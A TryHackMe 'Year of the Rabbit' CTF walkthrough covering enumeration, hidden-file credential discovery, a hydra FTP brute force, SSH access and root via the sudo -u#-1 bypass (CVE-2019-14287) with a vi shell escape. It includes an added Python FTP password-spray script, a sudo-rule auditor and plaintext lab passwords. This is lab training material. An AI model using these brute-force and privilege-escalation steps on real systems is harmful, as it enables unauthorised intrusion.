TryHackMe Year of the Rabbit Walkthrough: Easy CTF Guide for FTP, SSH, and Privilege Escalation
Summary: the article describes port scanning, directory enumeration, hidden-file analysis and password cracking to compromise the target system and obtain user and root privileges. 2025-9-8 11:23:15 Author: infosecwriteups.com

Prajwal


Introduction

In this walkthrough, I’ll unravel “Year of the Rabbit” — an easy-level CTF from TryHackMe. This challenge guides you through classic enumeration and web exploitation steps, with creative clues and a touch of humor along the way. Whether you’re sharpening your skills or just love a good puzzle, here’s how I approached and conquered this box.

Step 1: Enumeration and Port Scanning

I kicked off the challenge with an Nmap scan, combining default scripts with version detection (-sCV), to map out the exposed services and probable entry points. The command used:

nmap -sCV -vv <target-ip>

The results revealed three open ports:

  • Port 21: FTP
  • Port 22: SSH
  • Port 80: HTTP

Step 2: Directory Fuzzing and Web Clues

With port 80 open, I explored the web service and ran Gobuster to uncover hidden directories:

gobuster dir -u http://<target-ip> -w /usr/share/wordlists/dirb/common.txt


The scan uncovered an interesting directory: /assets.


Visiting http://<target-ip>/assets led to a web page containing several static files. Inspecting the CSS revealed a playful comment:
“Ahhh.., did not expect that NEVER GONNA GIVE UP!!!”


Step 3: Burp Suite Interception and Discovering Hidden Functionality

With no obvious leads from the static files or CSS, I turned to Burp Suite to intercept HTTP requests and look for anything unusual.

While monitoring the web traffic, I noticed a request for /sup3r_s3c3rt_fl4g.php, a hidden PHP page that wordlist-based enumeration had no chance of finding, which is why proxying the site's real traffic is worth doing even after fuzzing.

Navigating to this path opened a new layer of the challenge, and it was clear that something sensitive was being protected there.


Step 4: Analyzing Hidden Files and Extracting Credentials

At the hidden path I found an image, Hot_babe.png. Suspecting it carried a hidden clue, I downloaded the file for further inspection.

First, I ran exiftool to look for embedded metadata:

exiftool Hot_babe.png


The metadata was a curiosity but not the key; the breakthrough came from listing the printable text embedded in the file:

strings Hot_babe.png

Among the output was a plain-text block giving a username (ftpuser) and a list of candidate passwords. To automate the login attempts, I saved the passwords, one per line, to a file named rabbit.txt:

nano rabbit.txt

(No sudo is needed; the wordlist is an ordinary file in the working directory.)

Step 5: Brute Forcing FTP Credentials with Hydra

Armed with the username ftpuser and a list of potential passwords saved in rabbit.txt, I used Hydra to automate the brute-force attack on the FTP service:

hydra -l ftpuser -P rabbit.txt ftp://<target-ip>


After a short while, Hydra reported the valid password:

Password: 5iez1wGXKfPKQ

Using these credentials, I logged in successfully to the FTP server.
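As an added example (my own code, not the author's or the room's): the same two steps in one script, a minimal `strings` reimplementation that pulls the username and the candidate list out of the image, and an ftplib loop that plays hydra's role. The layout of the hint (username line first, one candidate per printable run), the sample bytes and the candidate tokens are constructed assumptions, not the real file contents.

```python
"""Added example, not code from the original write-up or the TryHackMe room:
reproduce the `strings`-based credential discovery and the FTP password
spray in one script. Assumptions (not stated on the page): the hint text in
Hot_babe.png starts with the username line and every later printable run is
one candidate password; the sample bytes below are constructed."""
from __future__ import annotations

import re
import sys
from ftplib import FTP, error_perm
from typing import Callable, Optional


def strings(data: bytes, min_len: int = 4) -> list[str]:
    """Equivalent of `strings`: printable ASCII runs of at least min_len bytes."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def extract_candidates(data: bytes, marker: str) -> tuple[Optional[str], list[str]]:
    """Return (username, candidate passwords) found after the first printable
    run containing `marker`; (None, []) if the marker is absent."""
    username: Optional[str] = None
    candidates: list[str] = []
    for run in strings(data):
        if username is None:
            if marker in run:
                username = marker
            continue
        token = run.strip()
        if token:
            candidates.append(token)
    return username, candidates


def ftp_login_ok(host: str, user: str, password: str, timeout: float = 5.0) -> bool:
    """One FTP login attempt. True on a 2xx reply, False on a 5xx permission
    error (wrong password). Network errors propagate so a dead host is not
    silently reported as 'password not found'."""
    try:
        with FTP(host, timeout=timeout) as ftp:
            ftp.login(user, password)
            return True
    except error_perm:
        return False


def spray(host: str, user: str, candidates: list[str],
          attempt: Callable[[str, str, str], bool] = ftp_login_ok) -> Optional[str]:
    """Try each candidate once and return the first that authenticates.
    `attempt` is injectable so the loop can be exercised without a live server."""
    for password in candidates:
        if attempt(host, user, password):
            return password
    return None


# Constructed stand-in for Hot_babe.png: a PNG signature, a dummy IHDR, an
# empty IEND chunk, and a plain-text hint appended after the image data.
SAMPLE_PNG = (
    b"\x89PNG\r\n\x1a\n"
    + b"\x00\x00\x00\rIHDR" + b"\x00" * 13 + b"\xa1\xb2\xc3\xd4"
    + b"\x00\x00\x00\x00IEND\xaeB`\x82"
    + b"ftpuser\nAlphaCandidat3\nB3taCandidat3\n5iez1wGXKfPKQ\n"
)

if __name__ == "__main__":
    # usage: python ftp_spray.py Hot_babe.png <target-ip>
    path, host = sys.argv[1], sys.argv[2]
    with open(path, "rb") as f:
        user, candidates = extract_candidates(f.read(), "ftpuser")
    print(f"{user}: {len(candidates)} candidates")
    print("valid password:", spray(host, user, candidates))
```

Hydra is the better tool for long lists because it parallelises connections; the point of the loop here is where the success/failure decision rests: on ftplib's `error_perm` (a 530 reply), while connection errors are left to propagate so a blocked or dead host is not misreported as "no valid password".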

Step 6: Accessing Sensitive Files in FTP

Once logged in to the FTP server, I listed the directory and found a file named Eli's_Creds.txt.

Using the FTP client, I downloaded it (the apostrophe in the name has to be quoted):

get "Eli's_Creds.txt"

The file contained a string made up of +, -, <, >, [, ] and . characters, i.e. Brainfuck source. Decoding it was the next puzzle, since it presumably held usable credentials.


Step 7: Decoding Brainfuck and Gaining SSH Access

After recognizing that the content of Eli's_Creds.txt was encoded in Brainfuck, I used an online Brainfuck decoder to translate it.

The decoded output revealed SSH credentials:

  • Username: eli
  • Password: DSpDiMlwAEwid


Using these credentials, I accessed the machine via SSH:

ssh eli@<target-ip>


Step 8: Searching for Secrets and User Switching

Using the locate command, I searched the file system for any paths containing "s3cr3t" (locate queries the updatedb index rather than the live file system, so find / -name '*s3cr3t*' 2>/dev/null is the fallback if the index is stale):

locate s3cr3t


This led me to a file in a directory matching the hint; reading it revealed a password for another user, gwendoline.

With this new information, I logged in as gwendoline (su gwendoline from eli's session, or a fresh SSH login):

  • Username: gwendoline
  • Password: MniVCQVhQHUNI


After logging in as Gwendoline, I found and captured the user flag, marking the completion of the initial access phase.

Step 9: Privilege Escalation via Sudo and vi Editor

To escalate privileges, I checked the commands available to the current user with:

sudo -l


This revealed a NOPASSWD rule allowing vi on /home/gwendoline/user.txt, but as any user other than root (a (ALL, !root) Runas specification). That restriction is what the following command bypasses:

sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt

On sudo versions before 1.8.28 (CVE-2019-14287; check with sudo --version), a user ID of -1 passes the !root exclusion but is converted to UID 0 when the command is executed, so vi starts as root. Once inside vi, I entered command mode with : and spawned a shell with:

:!/bin/sh

Since vi itself is running as root, the shell it spawns is a root shell.
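An added example (my code, not the author's): a parser for sudo -l output that flags the three properties this escalation depends on, so the same pattern can be recognised, or audited away, on other hosts. The sample output, the hostname target and the sudo version strings are constructed; the rule line reproduces the one the box grants gwendoline.

```python
"""Added example, not from the original write-up: audit `sudo -l` output for
the conditions the -u#-1 escalation relies on. The sample output and the
sudo version strings are constructed for the demonstration."""
from __future__ import annotations

import os
import re
from typing import NamedTuple

# Binaries whose normal use includes spawning a shell or running arbitrary
# commands (e.g. `:!/bin/sh` in vi); restricting their arguments in sudoers
# does not contain them.
SHELL_ESCAPE_BINARIES = {
    "vi", "vim", "view", "nano", "less", "more", "man",
    "awk", "find", "python", "python3", "perl",
}
CVE_2019_14287_FIXED = (1, 8, 28)

# "(Runas) TAG: TAG: command args" as printed by `sudo -l`
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$"
)


class Finding(NamedTuple):
    rule: str
    issue: str


def parse_version(version: str) -> tuple[int, int, int]:
    """'1.8.31p2' -> (1, 8, 31); the patch suffix does not matter here."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised sudo version: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def audit_sudo_l(output: str, sudo_version: str) -> list[Finding]:
    """Parse the rule lines of `sudo -l` and report why each one is dangerous."""
    vulnerable_sudo = parse_version(sudo_version) < CVE_2019_14287_FIXED
    findings: list[Finding] = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header lines such as "User x may run ..." carry no rule
        rule = line.strip()
        runas = [r.strip() for r in m["runas"].split(",")]
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        binary = os.path.basename(m["cmd"].split()[0])

        # (ALL, !root): "any user except root" is only a real restriction on
        # sudo >= 1.8.28. Before that, -u#-1 (or -u#4294967295) is not root
        # for the deny check but becomes UID 0 when the command is executed.
        if "ALL" in runas and any(r.startswith("!") for r in runas) and vulnerable_sudo:
            findings.append(Finding(rule, "negated Runas user is bypassed by "
                                    "sudo -u#-1 (CVE-2019-14287, sudo < 1.8.28)"))
        if binary in SHELL_ESCAPE_BINARIES:
            findings.append(Finding(rule, f"{binary} can spawn a shell as the "
                                    "target user; fixing its arguments does not help"))
        if "NOPASSWD" in tags:
            findings.append(Finding(rule, "NOPASSWD: no credential needed to use it"))
    return findings


# Constructed `sudo -l` output carrying the rule from this box.
SAMPLE_SUDO_L = """\
Matching Defaults entries for gwendoline on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User gwendoline may run the following commands on target:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
"""

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L, "1.8.16"):  # version string is constructed
        print(f"{f.rule}\n    -> {f.issue}")
```

The practical check on a foothold is sudo --version alongside sudo -l: the -u#-1 bypass only works below 1.8.28. The fix is correspondingly twofold: upgrade sudo, and stop granting editors with shell escapes as privileged commands, since the argument restriction is cosmetic.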


Step 10: Capturing the Root Flag

With root access obtained, I navigated to the root directory:

cd /root

I then read the root flag file:

cat root.txt


Conclusion

“Year of the Rabbit” is an excellent beginner-level TryHackMe challenge that combines essential penetration testing skills like enumeration, web fuzzing, file analysis, credential cracking, and privilege escalation. It offers a balanced and educational experience, guiding newcomers through a realistic attack path while encouraging creative problem-solving.

Thank you for reading this walkthrough! If you found it helpful, please consider clapping and following for more in-depth write-ups. Your support motivates me to continue sharing valuable content.

Until the next write-up, happy hacking! 😊


Source: https://infosecwriteups.com/tryhackme-year-of-the-rabbit-walkthrough-easy-ctf-guide-for-ftp-ssh-and-privilege-escalation-5e3217ccbfcb?source=rss----7b722bfd1b8d---4